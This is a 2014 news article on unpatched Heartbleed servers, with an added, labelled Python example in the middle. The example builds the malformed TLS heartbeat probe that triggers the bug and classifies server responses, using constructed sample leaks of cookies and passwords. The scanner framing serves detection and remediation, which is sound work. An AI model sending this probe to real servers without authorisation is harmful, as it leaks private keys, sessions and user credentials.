

Why you should still worry about Heartbleed

Antone Gonsalves | June 25, 2014
Patching of Internet-connected systems that contain the Heartbleed bug has slowed to a snail's pace, and security experts are advising companies to take extra precautions to avoid a security breach.

Errata Security scanned the Internet late Friday and found roughly 309,000 sites with the bug, which lies in the TLS heartbeat extension code of the OpenSSL Project's widely used SSL/TLS library. That is only about 9,000 fewer than Errata found a month ago.

When Heartbleed was disclosed in April, Errata found more than 600,000 vulnerable systems listening on port 443, the default port for HTTPS, the SSL/TLS-protected form of web traffic between clients and servers.

"This indicates people have stopped even trying to patch," Robert Graham, a security researcher at Errata, said Saturday in the company's blog. "We should see a slow decrease over the next decade as older systems are slowly replaced."

That's bad news for users of those sites. Heartbleed lets an unauthenticated attacker read up to 64 KB of the server process's memory per malformed heartbeat request, without leaving a trace in the application's logs. Repeated requests can turn up some of the most sensitive data a site holds, including its TLS private key, session cookies, and users' usernames and passwords.

The slowdown in patching and the number of unfixed systems did not surprise experts, who said the remaining servers likely belong to small businesses or sites that cannot afford the cost of deploying the fix.

About a half million SSL certificates were affected by the bug, which means they eventually had to be revoked and then replaced, Robert Miller, senior consultant at SecureState, said.

"It's going to take time to do that and some small companies might not have the money," Miller said. In the meantime, "the risk is still very high."

Errata did not list the domain names of the vulnerable sites and did not try to call the contacts listed with the domains.

Reaching out to them "would cause more problems than it would solve," Graham said in the comments section of the Errata blog.

However, that isn't the case with another site, un1c0rn.net (pronounced "unicorn"), which is selling information on sites it found with the Heartbleed bug.

Robert Hansen, vice president of WhiteHat Security's advanced technology group, estimates that there are about 75,000 websites listed on un1c0rn.net. Hansen provides details on the site on the WhiteHat blog.

"Anybody who uses those sites is vulnerable as long as the attackers have that information," Hansen told CSOonline. "No one should be using any of the sites on unicorn."

Companies should use one of the free scanning tools made available by vendors to check their own servers and, if possible, the sites that they know employees use, experts say.
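
The free scanners the experts refer to all do the same thing at the wire level: after a TLS handshake that negotiates the heartbeat extension, they send a heartbeat request whose payload_length field claims far more data than the record actually carries, then watch whether the server echoes back memory it should never have read. The following is an added example, not code from this article or from any vendor's tool, that builds that probe and classifies a server's response. The handshake itself (a ClientHello advertising extension type 0x000f) is assumed to have already happened and is not included; the sample responses are constructed, not captured from any real host.

```python
"""Record-level Heartbleed (CVE-2014-0160) check, as used by the public scanners.

Assumes a TLS handshake has already negotiated the heartbeat extension (type 0x000f);
that handshake is not included here. All sample traffic below is constructed.
"""
import struct

TLS_ALERT = 0x15
TLS_HEARTBEAT = 0x18
HB_REQUEST = 0x01
HB_RESPONSE = 0x02
TLS_RECORD_HEADER_LEN = 5  # content type (1) + version (2) + length (2)
HB_HEADER_LEN = 3          # heartbeat type (1) + payload_length (2)


def build_heartbeat_probe(claimed_len=0x4000, version=(3, 2), payload=b""):
    """Heartbeat request whose payload_length claims more bytes than the record carries.

    RFC 6520 requires the receiver to discard such a record silently; vulnerable OpenSSL
    trusted the field and echoed claimed_len bytes of heap memory. The defaults produce the
    classic 8-byte probe 18 03 02 00 03 01 40 00.
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def parse_records(data):
    """Split raw bytes into (content_type, version, body) TLS records; a truncated tail is dropped."""
    records, offset = [], 0
    while offset + TLS_RECORD_HEADER_LEN <= len(data):
        ctype, major, minor, length = struct.unpack_from("!BBBH", data, offset)
        start = offset + TLS_RECORD_HEADER_LEN
        body = data[start:start + length]
        if len(body) < length:
            break
        records.append((ctype, (major, minor), body))
        offset = start + length
    return records


def classify_response(response, sent_payload=b""):
    """Classify the bytes a server returned after the probe. Returns (verdict, leaked_bytes).

    'vulnerable'  : heartbeat response whose payload_length exceeds the payload we actually sent,
                    and which really carries that many bytes; the surplus is server memory.
    'bounded'     : heartbeat response that echoes no more than we sent (a compliant echo).
    'alert'       : the server answered with a TLS alert, i.e. it rejected the record.
    'no_response' : no heartbeat came back. Patched servers drop the probe silently, but so does
                    any server that never negotiated the extension, so this is not proof of a fix.
    """
    for ctype, _, body in parse_records(response):
        if ctype == TLS_HEARTBEAT and len(body) >= HB_HEADER_LEN and body[0] == HB_RESPONSE:
            resp_plen = struct.unpack_from("!H", body, 1)[0]
            echoed = body[HB_HEADER_LEN:HB_HEADER_LEN + resp_plen]
            if resp_plen > len(sent_payload) and len(echoed) == resp_plen:
                return "vulnerable", echoed[len(sent_payload):]
            return "bounded", b""
        if ctype == TLS_ALERT:
            return "alert", b""
    return "no_response", b""


def _heartbeat_response(payload, padding=b"\x00" * 16):
    """Build a heartbeat response record (used only to construct sample traffic)."""
    body = struct.pack("!BH", HB_RESPONSE, len(payload)) + payload + padding
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


PROBE = build_heartbeat_probe()

# Constructed, not captured: a vulnerable server echoes bytes it never received. A real
# server returns the full 0x4000 claimed bytes; a short made-up heap fragment stands in here.
VULNERABLE_RESPONSE = _heartbeat_response(
    b"Cookie: session=9f3a7c\x00\x00\x00user=alice&pass=hunter2\x00")
# A server rejecting the malformed record with a fatal (2) unexpected_message (10) alert.
ALERT_RESPONSE = struct.pack("!BBBH", TLS_ALERT, 3, 2, 2) + bytes([2, 10])
# A patched server following RFC 6520: the request is dropped and nothing comes back.
SILENT_RESPONSE = b""

if __name__ == "__main__":
    samples = [("vulnerable", VULNERABLE_RESPONSE), ("alert", ALERT_RESPONSE),
               ("silent", SILENT_RESPONSE)]
    for name, resp in samples:
        verdict, leaked = classify_response(resp)
        extra = f"leaked {len(leaked)} bytes: {leaked!r}" if leaked else ""
        print(f"{name:10s} -> {verdict} {extra}")
```

Two caveats a practitioner should keep in mind when reading a scanner's result. A clean result only says the binary now running is not over-reading; it says nothing about what was read out before the patch landed, so the private key and certificate still need to be replaced and the old certificate revoked, and user sessions and passwords reset. And checking `openssl version` instead of probing is unreliable, because distributions backport the fix without changing the upstream version string.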

Businesses also need to contact partner sites and cloud service providers to ensure that they are not vulnerable to an attacker exploiting Heartbleed, Miller said.

